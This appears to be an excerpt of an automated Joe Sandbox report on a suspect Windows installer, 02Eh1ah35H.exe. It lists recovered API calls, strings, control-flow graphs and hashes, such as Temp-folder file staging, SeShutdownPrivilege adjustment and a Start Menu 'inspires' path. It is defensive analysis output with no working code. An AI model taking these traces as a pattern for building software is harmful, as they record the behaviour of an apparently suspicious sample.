                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00403837
                                                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\02Eh1ah35H.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 0040384A
                                                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\02Eh1ah35H.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 00403859
                                                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\02Eh1ah35H.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 00403864
                                                                                                                                                                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\02Eh1ah35H.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 00403870
                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 0040388C
                                                                                                                                                                                • DeleteFileW.KERNEL32(0079F708,0079F708,?,007A9000,00000009,?,00000007,00000009,0000000B), ref: 004038E6
                                                                                                                                                                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\02Eh1ah35H.exe,0079F708,00000001,?,00000007,00000009,0000000B), ref: 004038FA
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,0079F708,0079F708,?,0079F708,00000000,?,00000007,00000009,0000000B), ref: 00403927
                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,0000000B,00000007,00000009,0000000B), ref: 00403956
                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 0040395D
                                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403972
                                                                                                                                                                                • AdjustTokenPrivileges.ADVAPI32 ref: 00403995
                                                                                                                                                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BA
                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 004039DD
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                                                                                • String ID: "C:\Users\user\Desktop\02Eh1ah35H.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires$C:\Users\user\Desktop$C:\Users\user\Desktop\02Eh1ah35H.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$kernel32::EnumResourceTypesA(i 0,i r8,i 0)$~nsu
                                                                                                                                                                                • API String ID: 3441113951-742160962
                                                                                                                                                                                • Opcode ID: ef7bc40cfc21a65b5c7abadd4c778368bce5dd0c15bdea56e8fa6b9d03db3f5a
                                                                                                                                                                                • Instruction ID: d7b9bf8e5ec5db16f392776339999e6c5d6af7d7718e861a4dfbc7241a8cc938
                                                                                                                                                                                • Opcode Fuzzy Hash: ef7bc40cfc21a65b5c7abadd4c778368bce5dd0c15bdea56e8fa6b9d03db3f5a
                                                                                                                                                                                • Instruction Fuzzy Hash: 65D1F6B1200310AAD7207F659D49B2B3AACEB81749F10843FF581B62D1DB7D8A55C76E

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetDlgItem.USER32(?,00000403), ref: 004055F3
                                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00405602
                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040563F
                                                                                                                                                                                • GetSystemMetrics.USER32(00000002), ref: 00405646
                                                                                                                                                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405667
                                                                                                                                                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405678
                                                                                                                                                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040568B
                                                                                                                                                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405699
                                                                                                                                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056AC
                                                                                                                                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056CE
                                                                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 004056E2
                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 00405703
                                                                                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405713
                                                                                                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040572C
                                                                                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405738
                                                                                                                                                                                • GetDlgItem.USER32(?,000003F8), ref: 00405611
                                                                                                                                                                                  • Part of subcall function 00404379: SendMessageW.USER32(00000028,?,00000001,004041A4), ref: 00404387
                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 00405755
                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00005529,00000000), ref: 00405763
                                                                                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 0040576A
                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 0040578E
                                                                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 00405793
                                                                                                                                                                                • ShowWindow.USER32(00000008), ref: 004057DD
                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405811
                                                                                                                                                                                • CreatePopupMenu.USER32 ref: 00405822
                                                                                                                                                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405836
                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00405856
                                                                                                                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040586F
                                                                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A7
                                                                                                                                                                                • OpenClipboard.USER32(00000000), ref: 004058B7
                                                                                                                                                                                • EmptyClipboard.USER32 ref: 004058BD
                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C9
                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 004058D3
                                                                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E7
                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405907
                                                                                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00405912
                                                                                                                                                                                • CloseClipboard.USER32 ref: 00405918
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                • String ID: {
                                                                                                                                                                                • API String ID: 590372296-366298937
                                                                                                                                                                                • Opcode ID: 76257269951a7008dfdc90867c28ba5585546a04cccc1881335d18026b5b47bc
                                                                                                                                                                                • Instruction ID: ce320b3aa05de7a86cd71a66421b7d26801e1fa413e38a053d13c4a4e4f3a794
                                                                                                                                                                                • Opcode Fuzzy Hash: 76257269951a7008dfdc90867c28ba5585546a04cccc1881335d18026b5b47bc
                                                                                                                                                                                • Instruction Fuzzy Hash: 43B15BB1900608FFDB119F64DD89EAE7B79FB44354F00802AFA45B61A0CB794E51DFA8
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 6FDF121B: GlobalAlloc.KERNEL32(00000040,?,6FDF123B,?,6FDF12DF,00000019,6FDF11BE,-000000A0), ref: 6FDF1225
                                                                                                                                                                                • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 6FDF1C8D
                                                                                                                                                                                • lstrcpyW.KERNEL32(00000008,?), ref: 6FDF1CD5
                                                                                                                                                                                • lstrcpyW.KERNEL32(00000808,?), ref: 6FDF1CDF
                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 6FDF1CF2
                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 6FDF1DD4
                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 6FDF1DD9
                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 6FDF1DDE
                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 6FDF1FC8
                                                                                                                                                                                • lstrcpyW.KERNEL32(?,?), ref: 6FDF2182
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000008), ref: 6FDF2201
                                                                                                                                                                                • LoadLibraryW.KERNEL32(00000008), ref: 6FDF2212
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?), ref: 6FDF226C
                                                                                                                                                                                • lstrlenW.KERNEL32(00000808), ref: 6FDF2286
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28269523122.000000006FDF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FDF0000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28269495512.000000006FDF0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.28269551381.000000006FDF4000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.28269577474.000000006FDF6000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6fdf0000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 245916457-0
                                                                                                                                                                                • Opcode ID: e4f092c925697fcf34ff27544432c66dfce45c35ea530508ac76049bcd1ae087
                                                                                                                                                                                • Instruction ID: 70c6531220d60802d2e4942c146eba30376f6cf8754db1f76d7c4c6f3447f643
                                                                                                                                                                                • Opcode Fuzzy Hash: e4f092c925697fcf34ff27544432c66dfce45c35ea530508ac76049bcd1ae087
                                                                                                                                                                                • Instruction Fuzzy Hash: F122ADB6D06745DEDB90CFB8C980AEDB7B4FF0631AF12462AD1A5E7180D77076828B50

                                                                                                                                                                                Control-flow Graph: blocks 405b00-405cc0 (legend: Executed, Not Executed)
                                                                                                                                                                                APIs
                                                                                                                                                                                • DeleteFileW.KERNELBASE(?,?,76F43420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B29
                                                                                                                                                                                • lstrcatW.KERNEL32(007A3F50,\*.*,007A3F50,?,?,76F43420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B71
                                                                                                                                                                                • lstrcatW.KERNEL32(?,0040A014,?,007A3F50,?,?,76F43420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B94
                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F50,?,?,76F43420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B9A
                                                                                                                                                                                • FindFirstFileW.KERNEL32(007A3F50,?,?,?,0040A014,?,007A3F50,?,?,76F43420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405BAA
                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C4A
                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00405C59
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                • String ID: "C:\Users\user\Desktop\02Eh1ah35H.exe"$C:\Users\user\AppData\Local\Temp\$P?z$\*.*
                                                                                                                                                                                • API String ID: 2035342205-156625688
                                                                                                                                                                                • Opcode ID: 9bcf84aa20197a85572e9300232fccf325a3569ae83ff5500f6c5511c7c60933
                                                                                                                                                                                • Instruction ID: d176cfcb2707c6ba555092c79fa60715814496245c058da0d6595325efdb1864
                                                                                                                                                                                • Opcode Fuzzy Hash: 9bcf84aa20197a85572e9300232fccf325a3569ae83ff5500f6c5511c7c60933
                                                                                                                                                                                • Instruction Fuzzy Hash: BE41D530804A15AAEB216B658D89EBF7678EF42715F14813FF801711D2DB7C5E82CE6E
                                                                                                                                                                                APIs
                                                                                                                                                                                • FindFirstFileW.KERNELBASE(76F43420,007A4F98,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,00405E14,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,76F43420,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,76F43420,C:\Users\user\AppData\Local\Temp\), ref: 00406757
                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00406763
                                                                                                                                                                                Strings
                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\nsbF672.tmp, xrefs: 0040674C
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsbF672.tmp
                                                                                                                                                                                • API String ID: 2295610775-4002028044
                                                                                                                                                                                • Opcode ID: 93d274fea3e94b44f6f55b1f097fc665565d90e42f153d0ad468ae4ce1295179
                                                                                                                                                                                • Instruction ID: 5230d556015edc92dacd95909e5542708b333c59f405b635cf09ddc887f28092
                                                                                                                                                                                • Opcode Fuzzy Hash: 93d274fea3e94b44f6f55b1f097fc665565d90e42f153d0ad468ae4ce1295179
                                                                                                                                                                                • Instruction Fuzzy Hash: CCD012315192205FC75027386F0C84B7A599F567353264B36F0AAF21E0C6788C3286AC

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EA7
                                                                                                                                                                                • ShowWindow.USER32(?), ref: 00403EC4
                                                                                                                                                                                • DestroyWindow.USER32 ref: 00403ED8
                                                                                                                                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403EF4
                                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00403F15
                                                                                                                                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F29
                                                                                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 00403F30
                                                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00403FDE
                                                                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00403FE8
                                                                                                                                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00404002
                                                                                                                                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404053
                                                                                                                                                                                • GetDlgItem.USER32(?,00000003), ref: 004040F9
                                                                                                                                                                                • ShowWindow.USER32(00000000,?), ref: 0040411A
                                                                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040412C
                                                                                                                                                                                • EnableWindow.USER32(?,?), ref: 00404147
                                                                                                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040415D
                                                                                                                                                                                • EnableMenuItem.USER32(00000000), ref: 00404164
                                                                                                                                                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040417C
                                                                                                                                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040418F
                                                                                                                                                                                • lstrlenW.KERNEL32(007A1F48,?,007A1F48,00000000), ref: 004041B9
                                                                                                                                                                                • SetWindowTextW.USER32(?,007A1F48), ref: 004041CD
                                                                                                                                                                                • ShowWindow.USER32(?,0000000A), ref: 00404301
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3282139019-0
                                                                                                                                                                                • Opcode ID: f1a328e51306031731dbcce9d1c3737ebdd7014b04a9a2d8d616989602e21706
                                                                                                                                                                                • Instruction ID: fd8a01c06953bfbcdc6c7a7ca4fde1a241a6ed83f8ebcdeac2000881ab9a06ac
                                                                                                                                                                                • Opcode Fuzzy Hash: f1a328e51306031731dbcce9d1c3737ebdd7014b04a9a2d8d616989602e21706
                                                                                                                                                                                • Instruction Fuzzy Hash: 67C1BFB1604604AFDB206F61ED85D2A3B78EBCA705B10853EF651B11F0CB3D9941DB6E

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 004067E3: GetModuleHandleA.KERNEL32(?,00000020,?,00403514,0000000B), ref: 004067F5
                                                                                                                                                                                  • Part of subcall function 004067E3: GetProcAddress.KERNEL32(00000000,?), ref: 00406810
                                                                                                                                                                                • GetUserDefaultUILanguage.KERNELBASE(00000002,76F43420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\02Eh1ah35H.exe",00000000), ref: 00403AD7
                                                                                                                                                                                  • Part of subcall function 00406335: wsprintfW.USER32 ref: 00406342
                                                                                                                                                                                • lstrcatW.KERNEL32(1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000,00000002,76F43420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\02Eh1ah35H.exe",00000000), ref: 00403B3E
                                                                                                                                                                                • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires,1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000,00000002,76F43420), ref: 00403BBE
                                                                                                                                                                                • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires,1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000), ref: 00403BD1
                                                                                                                                                                                • GetFileAttributesW.KERNEL32(Call), ref: 00403BDC
                                                                                                                                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires), ref: 00403C25
                                                                                                                                                                                • RegisterClassW.USER32(007A7A00), ref: 00403C62
                                                                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C7A
                                                                                                                                                                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CAF
                                                                                                                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00403CE5
                                                                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit20W,007A7A00), ref: 00403D11
                                                                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit,007A7A00), ref: 00403D1E
                                                                                                                                                                                • RegisterClassW.USER32(007A7A00), ref: 00403D27
                                                                                                                                                                                • DialogBoxParamW.USER32(?,00000000,00403E6B,00000000), ref: 00403D46
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                • String ID: "C:\Users\user\Desktop\02Eh1ah35H.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                                                • API String ID: 606308-2759440662

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00403026
                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\02Eh1ah35H.exe,00000400,?,00000007,00000009,0000000B), ref: 00403042
                                                                                                                                                                                  • Part of subcall function 00405EE4: GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\02Eh1ah35H.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405EE8
                                                                                                                                                                                  • Part of subcall function 00405EE4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405F0A
                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\02Eh1ah35H.exe,C:\Users\user\Desktop\02Eh1ah35H.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 0040308E
                                                                                                                                                                                • GlobalAlloc.KERNELBASE(00000040,0000000B,?,00000007,00000009,0000000B), ref: 004031C4
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                                                • String ID: "C:\Users\user\Desktop\02Eh1ah35H.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\02Eh1ah35H.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                • API String ID: 2803837635-2235659462

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040656C
                                                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,007A0F28,?,0040548D,007A0F28,00000000), ref: 0040657F
                                                                                                                                                                                • SHGetSpecialFolderLocation.SHELL32(0040548D,0079A700,00000000,007A0F28,?,0040548D,007A0F28,00000000), ref: 004065BB
                                                                                                                                                                                • SHGetPathFromIDListW.SHELL32(0079A700,Call), ref: 004065C9
                                                                                                                                                                                • CoTaskMemFree.OLE32(0079A700), ref: 004065D4
                                                                                                                                                                                • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065FA
                                                                                                                                                                                • lstrlenW.KERNEL32(Call,00000000,007A0F28,?,0040548D,007A0F28,00000000), ref: 00406652
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                                                                • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                • API String ID: 717251189-1230650788
                                                                                                                                                                                • Opcode ID: aaa997f56c542f4584990acf2269000a5d9ad94e2d12eeb77129bcfb95bdb2f4
                                                                                                                                                                                • Instruction ID: 6a9894c1754425a34e634a53c322024ca71031740d406166b65bc8419ebad360
                                                                                                                                                                                • Opcode Fuzzy Hash: aaa997f56c542f4584990acf2269000a5d9ad94e2d12eeb77129bcfb95bdb2f4
                                                                                                                                                                                • Instruction Fuzzy Hash: A261F471600505ABDF249F24DD40ABE37A5AF51318F22813FE543BA2D4DB3D8AA1CB5E

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 783 40176f-401794 call 402d3e call 405d3a 788 401796-40179c call 4063ee 783->788 789 40179e-4017b0 call 4063ee call 405cc3 lstrcatW 783->789 794 4017b5-4017b6 call 40669d 788->794 789->794 798 4017bb-4017bf 794->798 799 4017c1-4017cb call 40674c 798->799 800 4017f2-4017f5 798->800 807 4017dd-4017ef 799->807 808 4017cd-4017db CompareFileTime 799->808 802 4017f7-4017f8 call 405ebf 800->802 803 4017fd-401819 call 405ee4 800->803 802->803 810 40181b-40181e 803->810 811 40188d-4018b6 call 405456 call 40324c 803->811 807->800 808->807 813 401820-40185e call 4063ee * 2 call 40642b call 4063ee call 405a54 810->813 814 40186f-401879 call 405456 810->814 825 4018b8-4018bc 811->825 826 4018be-4018ca SetFileTime 811->826 813->798 847 401864-401865 813->847 823 401882-401888 814->823 827 402bcb 823->827 825->826 829 4018d0-4018db CloseHandle 825->829 826->829 830 402bcd-402bd1 827->830 832 4018e1-4018e4 829->832 833 402bc2-402bc5 829->833 835 4018e6-4018f7 call 40642b lstrcatW 832->835 836 4018f9-4018fc call 40642b 832->836 833->827 842 401901-402390 835->842 836->842 845 402395-40239a 842->845 846 402390 call 405a54 842->846 845->830 846->845 847->823 848 401867-401868 847->848 848->814
                                                                                                                                                                                APIs
                                                                                                                                                                                • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires,?,?,00000031), ref: 004017B0
                                                                                                                                                                                • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires,?,?,00000031), ref: 004017D5
                                                                                                                                                                                  • Part of subcall function 004063EE: lstrcpynW.KERNEL32(?,?,00000400,00403573,007A7A60,NSIS Error,?,00000007,00000009,0000000B), ref: 004063FB
                                                                                                                                                                                  • Part of subcall function 00405456: lstrlenW.KERNEL32(007A0F28,00000000,0079A700,76F423A0,?,?,?,?,?,?,?,?,?,0040338D,00000000,?), ref: 0040548E
                                                                                                                                                                                  • Part of subcall function 00405456: lstrlenW.KERNEL32(0040338D,007A0F28,00000000,0079A700,76F423A0,?,?,?,?,?,?,?,?,?,0040338D,00000000), ref: 0040549E
                                                                                                                                                                                  • Part of subcall function 00405456: lstrcatW.KERNEL32(007A0F28,0040338D,0040338D,007A0F28,00000000,0079A700,76F423A0), ref: 004054B1
                                                                                                                                                                                  • Part of subcall function 00405456: SetWindowTextW.USER32(007A0F28,007A0F28), ref: 004054C3
                                                                                                                                                                                  • Part of subcall function 00405456: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E9
                                                                                                                                                                                  • Part of subcall function 00405456: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405503
                                                                                                                                                                                  • Part of subcall function 00405456: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405511
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
